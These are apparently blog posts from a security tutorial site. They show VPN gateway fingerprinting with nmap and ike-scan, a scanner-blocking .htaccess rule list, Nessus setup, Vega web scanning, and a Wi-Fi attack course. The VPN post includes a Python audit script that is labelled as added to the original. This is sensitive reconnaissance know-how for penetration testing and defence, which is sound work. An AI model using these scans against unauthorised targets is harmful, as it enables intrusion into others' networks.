<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-41AngL-oukI/Usk3tsFp4dI/AAAAAAAAFUQ/_j78bhEV2ho/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-41AngL-oukI/Usk3tsFp4dI/AAAAAAAAFUQ/_j78bhEV2ho/s320/4.png" /></a></div><li>Finally, double click on the value to edit it, or right click and choose edit HTML, and paste the fbid value that you copied in step "2" above.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-4lhECPWUa6s/Usk4L3yGRxI/AAAAAAAAFUY/J8qDEflAkMo/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-4lhECPWUa6s/Usk4L3yGRxI/AAAAAAAAFUY/J8qDEflAkMo/s320/5.png" /></a></div><br />
Click to save the change, close the "Inspect element" window, and finally click "Save". Voila, that's done :).<br />
Thanks a lot, keep visiting and have fun.<br />
Posted by Chandrakant<br />
<br />
Penetration Testing VPN With Ike Scanner On Backtrack Part-1<br />
Published 2013-12-25T23:07:00.000+05:30, updated 2013-12-25T23:09:59.287+05:30<br />
Hi all. As you all know, many organisations use VPNs quite actively these days, so we will take a quick look at penetration testing a Virtual Private Network using ike-scan on BackTrack.<br />
There is a myth in everyone's mind that a VPN provides full protection against hackers (meaning no hacker can get in :P). It is never like that: if a loophole exists, an attacker can break into the network however high the security. A VPN does ensure some level of protection, but we will still discuss some good and bad points of VPN connections.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-Qb7ZSMAmlIs/UrsXs4_dfGI/AAAAAAAAFTg/TIa-jCxFpuc/s1600/vpn-service.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Penetration Testing VPN Network" src="http://3.bp.blogspot.com/-Qb7ZSMAmlIs/UrsXs4_dfGI/AAAAAAAAFTg/TIa-jCxFpuc/s620/vpn-service.jpg" height="300" width="550" /></a></div>The purpose of VPN penetration testing is to help the organisation baseline its current VPN security posture (identify the loopholes that exist in the present implementation and modify the configuration accordingly to protect itself from known problems), identify threats and weaknesses, and implement a new security policy that will mitigate risks.<br />
<br />
Penetration testing a VPN network involves several phases:<br />
<br />
<li>Scanning or identifying the VPN gateway.<br />
<li>Fingerprinting the VPN gateway for guessing implementation.<br />
<li>PSK mode assessment and PSK sniffing.<br />
<li>Offline PSK cracking.<br />
<li>Checking for default user accounts.<br />
<li>Testing the VPN gateway for vendor specific vulnerabilities.<br />
<br />
The first step can easily be done with tools like <a href="http://www.darksite.co.in/2013/08/nmap-commands-for-hackers-kali.html">nmap</a>.<br />
Example:<br />
<blockquote>root@bt:~# <b>nmap -sU -p 500 172.16.21.200</b><br />
Starting Nmap 5.51 (http://nmap.org) at 2011-11-26 10:56 IST<br />
Nmap scan report for 172.16.21.200<br />
Host is up (0.00036s latency).<br />
PORT STATE SERVICE<br />
500/udp open isakmp<br />
MAC Address: 00:1B:D5:54:4D:E4 (Cisco Systems)<br />
<br />
Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds<br />
</blockquote>As you can see, I have used -sU for a UDP scan, and -p to specify port 500.<br />
<br />
<b>IKE Scan Tool :-</b><br />
Ike-scan is a simple but powerful command-line tool that is used to find and fingerprint VPN gateways. It sends specially crafted IKE packets to target gateways and lists any IKE responses that are received. By default, Ike-scan works in main mode, and sends a packet to the gateway with an ISAKMP header and a single proposal with eight transforms inside it.<br />
<br />
Each transform contains a number of attributes like DES or 3DES as the encryption algorithm, SHA or MD5 as the integrity algorithm, a pre-shared key as the authentication type, Diffie-Hellman 1 or 2 as the key distribution algorithm and 28800 seconds as the lifetime.<br />
<br />
Initial VPN discovery with Ike-scan is as shown below:<br />
<blockquote>root@bt:~# ike-scan -M 172.16.21.200<br />
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)<br />
172.16.21.200 Main Mode Handshake returned<br />
HDR=(CKY-R=d90bf054d6b76401)<br />
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)<br />
VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)<br />
<br />
Ending ike-scan 1.9: 1 hosts scanned in 0.015 seconds (65.58 hosts/sec). 1 returned handshake; 0 returned notify<br />
</blockquote>The -M shows each payload in a line, so that the output will be neat and easy to understand. The output can be any of the following:<br />
<br />
<li>0 returned handshake; 0 returned notify: This means the target is not an IPsec gateway.<br />
<li>1 returned handshake; 0 returned notify: This means the target is configured for IPsec and is willing to perform IKE negotiation, and either one or more of the transforms you proposed are acceptable.<br />
<li>0 returned handshake; 1 returned notify: VPN gateways respond with a notify message when none of the transforms are acceptable (though some gateways do not, in which case further analysis and a revised proposal should be tried).<br />
In the example shown, the VPN gateway replies with one returned handshake and the acceptable transform set has these parameters:<br />
<blockquote>Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800<br />
</blockquote>Custom transform sets can be tried against the target with the "--trans" switch:<br />
<blockquote>--trans=(1=1,2=2,3=1,4=2)<br />
</blockquote>where 1=Encryption Algorithm, 2=Hash Algorithm, 3=Authentication Method, 4=Group Description, and 5=Group Type.<br />
<br />
Kindly refer to <a href="http://www.ietf.org/rfc/rfc2409.txt">RFC 2409</a> Appendix A for a complete understanding of transform set values. There are a number of other tools available for IPsec scanning, such as ipsectrace and ipsecscan, but Ike-scan is undoubtedly one of the best, and it is frequently updated.<br />
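The three handshake/notify cases and the accepted transform set described above can be read out of the scan output automatically. The following Python sketch is an added example, not part of the original post or of ike-scan itself: it parses the -M output quoted earlier and flags accepted parameters against an assumed hardening baseline (the WEAK table and all function names are assumptions made for illustration).<br />

```python
import re

# Sample input: the ike-scan -M output quoted in the post above.
SAMPLE = """\
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
172.16.21.200 Main Mode Handshake returned
HDR=(CKY-R=d90bf054d6b76401)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)

Ending ike-scan 1.9: 1 hosts scanned in 0.015 seconds (65.58 hosts/sec). 1 returned handshake; 0 returned notify
"""

# Assumed hardening baseline (not from the post): accepted values worth flagging.
WEAK = {
    "Enc": {"DES": "56-bit key", "3DES": "64-bit block cipher, legacy"},
    "Hash": {"MD5": "legacy hash, prefer SHA-2", "SHA1": "legacy hash, prefer SHA-2"},
    "Group": {"1:modp768": "768-bit DH group", "2:modp1024": "1024-bit DH group"},
}

HOST_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3})\s+(\S.*)$")
SA_RE = re.compile(r"^SA=\((.*)\)$")
SUMMARY_RE = re.compile(r"(\d+) returned handshake; (\d+) returned notify")


def parse_ike_scan(text):
    """Return ({ip: {"status": str, "sa": dict}}, (handshakes, notifies))."""
    hosts, current, summary = {}, None, None
    for raw in text.splitlines():
        line = raw.strip()  # tolerate indented payload lines
        if (m := SUMMARY_RE.search(line)):
            summary = (int(m.group(1)), int(m.group(2)))
        elif (m := HOST_RE.match(line)):
            current = hosts.setdefault(m.group(1), {"status": m.group(2), "sa": {}})
        elif (m := SA_RE.match(line)) and current is not None:
            pairs = (kv.split("=", 1) for kv in m.group(1).split() if "=" in kv)
            current["sa"] = dict(pairs)
    return hosts, summary


def classify(summary):
    """Map the summary counters to the three cases listed in the post."""
    handshakes, notifies = summary
    if handshakes:
        return "IPsec gateway: at least one proposed transform was accepted"
    if notifies:
        return "IPsec gateway: none of the proposed transforms was accepted"
    return "no IKE response: not an IPsec gateway, or it stayed silent"


def audit(sa):
    """List accepted SA attributes that fall below the assumed baseline."""
    return [f"{attr}={sa[attr]}: {bad[sa[attr]]}"
            for attr, bad in WEAK.items() if sa.get(attr) in bad]


if __name__ == "__main__":
    hosts, summary = parse_ike_scan(SAMPLE)
    print(classify(summary))
    for ip, info in hosts.items():
        print(ip, info["status"], audit(info["sa"]))
```

Run against a gateway you administer, the audit list shows which accepted parameters to remove from the gateway's IKE policy.<br />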
<br />
Vulnerability assessment tools like Nessus, Nexpose, etc, can be used to identify the vulnerabilities of VPN implementations. A full security audit on the target gateway with such types of tools will generate a detailed report with all identified problems and the mitigation steps available.<br />
<br />
I will post further penetration testing in a later tutorial. Please leave your comment below if you have any query.<br />
Posted by Chandrakant<br />
<br />
<h2>Free Learn Wifi Security With Vivek Ramachandran ( Books | Video Tutorials & Concepts )</h2>
Published: 2013-12-25T15:16:00.002+05:30; updated: 2013-12-25T15:17:23.692+05:30<br />
Hi everyone, it really feels great that Vivek Ramachandran Sir has done an awesome video series on Wi-Fi security, which makes most of the concepts related to Wi-Fi security clear. For the past few days I have had a great interest in learning Wi-Fi security, so I found the Wi-Fi security series by Vivek Sir, and let me tell you, this video series contains some quality training material with live practicals and clear-cut understanding.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-ZWnr2QHW2iA/UrqnroEwaxI/AAAAAAAAFTI/jdFiIZaBDg0/s1600/free+learn.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="free download wifi hacking videos and books" src="http://1.bp.blogspot.com/-ZWnr2QHW2iA/UrqnroEwaxI/AAAAAAAAFTI/jdFiIZaBDg0/s1600/free+learn.png" /></a></div><b>You must have seen our previous Post </b><br />
<br />
<a href="http://www.darksite.co.in/2013/05/free-download-backtrack-5-wireless.html">Free download BackTrack 5 Wireless Penetration Testing By Vivek Ramachandran</a>, which shares a free e-book by Vivek Sir.<br />
<br />
<b>Let me tell you about some of the contents of the video series:</b><br />
<br />
It is fully practical, with explanations. It is best for penetration testers, security enthusiasts and network administrators.<br />
This video series will take you through a journey in wireless LAN (in)security and penetration testing. It starts with the very basics of how WLANs work, graduates to packet sniffing and injection attacks, moves on to auditing infrastructure vulnerabilities, covers breaking into WLAN clients and finally looks at advanced hybrid attacks involving wireless and applications.<br />
<br />
<b>A non-exhaustive list of topics to be taught includes:</b><br />
<br />
<li>Bypassing WLAN Authentication – Shared Key, MAC Filtering, Hidden SSIDs<br />
<li>Cracking WLAN Encryption – WEP, WPA/WPA2 Personal and Enterprise, Understanding encryption based flaws (WEP,TKIP,CCMP)<br />
<li>Attacking the WLAN Infrastructure – Rogue Devices, Evil Twins, DoS Attacks, MITM, Wi-Fi Protected Setup<br />
<li>Advanced Enterprise Attacks – 802.1x, EAP, LEAP, PEAP, EAP-TTLS<br />
<li>Attacking the Wireless Client – Honeypots and Hotspot attacks, Caffe-Latte, Hirte, Ad-Hoc Networks and Viral SSIDs, WiFishing<br />
<li>Breaking into the Client – Metasploit, SET, Social Engineering<br />
<li>Enterprise Wi-Fi Worms, Backdoors and Botnets<br />
<br />
<b>About Vivek Ramachandran (Author of Book / Trainer):<br />
</b><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-m1av9AeJqps/UrqodsnCGOI/AAAAAAAAFTQ/u6ulo66ok74/s1600/vivek+sir.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img alt="Vivek Ramachandran" src="http://2.bp.blogspot.com/-m1av9AeJqps/UrqodsnCGOI/AAAAAAAAFTQ/u6ulo66ok74/s1600/vivek+sir.jpg" /></a></div>Vivek has been into wireless security research since 2003. He was also one of the winners of the Microsoft Security Shootout contest held in India among a reported 65,000 participants. His work on wireless security has been quoted in BBC online, InfoWorld, MacWorld, The Register, IT World Canada and other places. He has spoken/trained at top conferences around the world including Blackhat USA and Abu Dhabi, Defcon, Hacktivity, Brucon, ClubHack, SecurityByte, SecurityZone, Nullcon, C0C0n, etc. He is best known in the hacker community as the founder of SecurityTube.net, where he routinely posts videos on Wi-Fi security, assembly language and exploitation techniques.<br />
<br />
I think all you security geeks know him, so there is no need to write more about him.<br />
<br />
<a href="http://securitytube.aircrack-ng.org/Wi-Fi-Security-Megaprimer/WLAN-Security-Megaprimer-v1.iso">Download All Free Video Tutorial</a> (iso File 4.2 GB)<br />
You can also watch all the video tutorials part-wise <a href="http://www.securitytube.net/groups?operation=view&groupId=9">here</a>.<br />
<br />
To start with, you need an ALFA NETWORK AWUS036NH 2W USB Wireless N Adapter, which you can easily purchase from<a href="http://www.ebay.com/itm/ALFA-NETWORK-AWUS036NH-2W-USB-Wireless-N-Adapter-WiFi-b-g-N-2000mW-/400611594109?pt=US_USB_Wi_Fi_Adapters_Dongles&hash=item5d464fcf7d"> eBay</a>/Amazon. You also need to <a href="http://www.darksite.co.in/2012/05/how-to-install-backtrack-5-r1-in-your.html">set up BackTrack</a> on your laptop/PC (<a href="http://www.darksite.co.in/2012/08/how-to-install-vmware-tools-in-backtrack.html">VMware/VirtualBox</a>), which I think is very easy, and I know even a kid can do it.<br />
<br />
So even I have started to learn Wi-Fi security and have gone up to 22+ videos; the whole video series contains 45+ videos, so have fun, and special thanks to Vivek Sir _/\_ for making these videos and sharing them for free.<br />
Posted by Chandrakant<br />
<br />
<h2>How to Protect your website from web vulnerability Scanners</h2>
Published: 2013-12-22T03:55:00.001+05:30; updated: 2014-01-14T13:01:03.872+05:30<br />
Hello, here I come with a small but quite useful trick that can make your website safe from kiddie hackers :P. New hackers often use various web scanners like Acunetix, Nessus, OpenVAS and other scanners available in BackTrack. So, being a web security guy, how can you protect your website from such automated scanners? The code is very simple: all you need to do is add the code given below to your .htaccess file.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-RPof0-1im78/UrYVEu9P77I/AAAAAAAAFS4/3serRHoAdqA/s1600/hacker.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="protect from web vulnerability scanners" src="http://4.bp.blogspot.com/-RPof0-1im78/UrYVEu9P77I/AAAAAAAAFS4/3serRHoAdqA/s620/hacker.png" /></a></div><blockquote># Redirect requests that identify themselves as a known scanner to 127.0.0.1<br />
&lt;IfModule mod_rewrite.c&gt;<br />
RewriteEngine On<br />
RewriteCond %{HTTP_USER_AGENT} ^w3af\.sourceforge\.net [NC,OR]<br />
RewriteCond %{HTTP_USER_AGENT} dirbuster [NC,OR]<br />
RewriteCond %{HTTP_USER_AGENT} nikto [NC,OR]<br />
RewriteCond %{HTTP_USER_AGENT} SF [OR]<br />
RewriteCond %{HTTP_USER_AGENT} sqlmap [NC,OR]<br />
RewriteCond %{HTTP_USER_AGENT} fimap [NC,OR]<br />
RewriteCond %{HTTP_USER_AGENT} nessus [NC,OR]<br />
RewriteCond %{HTTP_USER_AGENT} whatweb [NC,OR]<br />
RewriteCond %{HTTP_USER_AGENT} Openvas [NC,OR]<br />
RewriteCond %{HTTP_USER_AGENT} jbrofuzz [NC,OR]<br />
RewriteCond %{HTTP_USER_AGENT} libwhisker [NC,OR]<br />
RewriteCond %{HTTP_USER_AGENT} webshag [NC,OR]<br />
# Acunetix WVS is matched on its own request header, not on the User-Agent<br />
RewriteCond %{HTTP:Acunetix-Product} ^WVS<br />
RewriteRule ^.* http://127.0.0.1/ [R=301,L]<br />
&lt;/IfModule&gt;<br />
</blockquote>After adding this content to .htaccess, save the file. This is just a countermeasure to keep away web scanners that identify themselves in their request headers. Hope you like this post; do share, comment and like, and thank you :).<br />
Posted by Chandrakant<br />
<br />
<h2>Installing Nessus Scanner For Network Vulnerability in Backtrack</h2>
Published: 2013-12-21T14:59:00.001+05:30; updated: 2013-12-25T15:18:43.561+05:30<br />
Uhh... hi everyone, after a long time I have started posting tutorials again, so let's get started. Today we will be installing the Nessus scanner on BackTrack and using it. <a href="http://www.darksite.co.in/2012/05/how-to-install-and-configure-best.html">Check my long old post :D </a><br />
<h3>What Is Nessus For?</h3><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-pbnxCY-pry8/UrVfLlBYacI/AAAAAAAAFSo/5Hyj477KZN4/s1600/nessus.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-pbnxCY-pry8/UrVfLlBYacI/AAAAAAAAFSo/5Hyj477KZN4/s320/nessus.jpg" /></a></div>Nessus is a network vulnerability scanning program that gives you the power to find all the vulnerabilities present on a network/host. It is free for personal use. It can detect vulnerabilities on systems. Nessus is the most popular vulnerability scanner in computer security. Nessus scans for vulnerabilities, misconfigurations, default passwords / common passwords / blank passwords on some system accounts, etc. You can use Nessus to scan your system and patch the vulnerabilities. If you want to install Nessus on BackTrack 5 R3, the first thing to do is download it from <a href="http://www.tenable.com/products/nessus/">http://www.tenable.com/products/nessus/</a><br />
<br />
So we will discuss how to install it online (if you have an internet connection).<br />
Nessus 4.4.1 now comes pre-installed on BackTrack 5 and requires that the user activate the installation.<br />
Here are the commands to install Nessus. Open a terminal and type (if you don't know :P):<br />
<br />
<b>apt-get install nessus</b><br />
<br />
After installing it, create an account with the nessus-adduser command like this:<br />
<br />
<b>/opt/nessus/sbin/nessus-adduser</b><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-SwkweRQbTY4/UrVbLiCeDcI/AAAAAAAAFSQ/CRXG3w8ZclU/s1600/BT5-Adding-User.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-SwkweRQbTY4/UrVbLiCeDcI/AAAAAAAAFSQ/CRXG3w8ZclU/s400/BT5-Adding-User.png" /></a></div>After you've entered a username, the nessus-adduser program asks you if the user account should have admin privileges or not. It is recommended that the initial user account have admin privileges so you can use the Nessus Web Interface to create subsequent accounts. The only difference between a Nessus admin user and a regular user is the ability to create user accounts.<br />
<h3>Registering Account For Nessus</h3><br />
Once you have Nessus installed on BackTrack 5, you will need to obtain a Nessus activation code. If you wish to purchase a ProfessionalFeed, you can visit the <a href="https://store.tenable.com/">Tenable Store</a>. If you are using Nessus at home or wish to evaluate Nessus, you can <a href="http://www.tenable.com/products/nessus/nessus-homefeed">register a HomeFeed</a>. It’s important to note that the HomeFeed is limited to 16 IP addresses per scan (whereas the ProfessionalFeed allows you to scan an unlimited number of IP addresses). The ProfessionalFeed also gives you access to features such as Configuration and Sensitive Data Auditing, SCADA plugins, Nessus Technical Support and access to the Tenable Customer Portal.<br />
<br />
After you register, they will send an activation code to your email. After you get the key, run this command, replacing xxxx-xxxx-xxxx-xxxx-xxxx with your key:<br />
<br />
<b>/opt/nessus/bin/nessus-fetch --register xxxx-xxxx-xxxx-xxxx-xxxx</b><br />
<br />
It will take some time because the plugins are being updated. After the update completes, start Nessus:<br />
<br />
<b>/etc/init.d/nessusd start</b><br />
<br />
Then <b>open your browser and type</b> this into the address bar:<br />
<br />
<b>https://localhost:8834/</b><br />
(You can also access the Nessus Web Interface remotely/outside by using the IP address assigned to BackTrack 5 (e.g. https://192.168.37.210:8834/).)<br />
<br />
Nessus runs over the secure channel HTTPS on port number 8834.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-B7FcjH3YytI/UrVdkT0oTdI/AAAAAAAAFSc/A1cq0Dj8tRo/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-B7FcjH3YytI/UrVdkT0oTdI/AAAAAAAAFSc/A1cq0Dj8tRo/s320/2.png" /></a></div><br />
Now try and use Nessus at your own risk :-D..<br />
<br />
In the next tutorial I will post how to scan a host and get a report using the Nessus scanner. If you need any help with any tool, do post a comment and I will definitely reply to you. I also encourage everyone to use BackTrack if you want to learn more about security.<br />
Posted by Chandrakant<br />
<br />
<h2>Scanning For Web Vulnerability Using Vega Scanner On Backtrack | kali</h2>
Published: 2013-11-12T00:02:00.004+05:30; updated: 2013-11-12T00:05:58.326+05:30<br />
Hi everyone, this is one more post on another web vulnerability scanner tool. This time we will be discussing a tool known as Vega. It is a very simple tool to use, and it detects some quality (high) vulnerabilities...<br />
<br />
<b>About Vega : </b><br />
Vega is an open source scanner and testing platform to test the security of web applications. Vega can help you find and validate SQL Injection, Cross-Site Scripting (XSS), inadvertently disclosed sensitive information, and other vulnerabilities. <br />
Vega includes an automated scanner for quick tests and an intercepting proxy for tactical inspection. Vega can be extended using a powerful API in the language of the web: JavaScript. <br />
Vega was developed by Subgraph.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-9n-0R4BHed0/UoEfRPcgMFI/AAAAAAAAFRI/dSeME-xCbbY/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="vega scanner" height="300" width="560" src="http://3.bp.blogspot.com/-9n-0R4BHed0/UoEfRPcgMFI/AAAAAAAAFRI/dSeME-xCbbY/s700/1.png" /></a></div><br />
Let's scan a website for vulnerabilities. You can open this tool directly in BackTrack via the following menu path:<br />
<b><br />
Backtrack > vulnerability assessment > web application assessment > web vulnerability scanner > vega</b><br />
Of course, you can also launch it with these commands in a terminal:<br />
<b># cd /pentest/web/vega<br />
# ./Vega</b><br />
This opens the scanner's graphical user interface. Now select the scan option at the top.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-bFpYlhS0ExA/UoEhFDzsFBI/AAAAAAAAFRU/Sxjw4n6LTqg/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="vega scanner" height="350" width="560" src="http://2.bp.blogspot.com/-bFpYlhS0ExA/UoEhFDzsFBI/AAAAAAAAFRU/Sxjw4n6LTqg/s640/2.png" /></a></div><br />
It will ask you for the URL to scan and, below it, the options you can mark for the scan.<br />
<br />
Next, you can even set the login cookie if your site needs credentials for access.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-yMgLSuxKAlI/UoEhqvjV4EI/AAAAAAAAFRc/L5DPgDZEf1Q/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="vega scanner" height="300" width="560" src="http://4.bp.blogspot.com/-yMgLSuxKAlI/UoEhqvjV4EI/AAAAAAAAFRc/L5DPgDZEf1Q/s600/3.png" /></a></div><br />
Next, click Finish. It will scan your website quickly and show the vulnerability count as well as the URLs below.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-xb3DAecqZ-g/UoEh9b4SKMI/AAAAAAAAFRk/J9PvzerCS3E/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="vega scanner" height="300" width="560" src="http://3.bp.blogspot.com/-xb3DAecqZ-g/UoEh9b4SKMI/AAAAAAAAFRk/J9PvzerCS3E/s600/4.png" /></a></div><br />
Next, you just need to re-verify/cross-check those vulnerable URLs by following them and testing whether they are exploitable.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-jDfTgaWesUE/UoEjA4jeo6I/AAAAAAAAFRs/UtcyxKpSsIw/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="vega scanner" height="300" width="560" src="http://3.bp.blogspot.com/-jDfTgaWesUE/UoEjA4jeo6I/AAAAAAAAFRs/UtcyxKpSsIw/s600/5.png" /></a></div>You can also easily prepare reports to show to your boss ;).<br />
Have fun...<br />
Posted by Chandrakant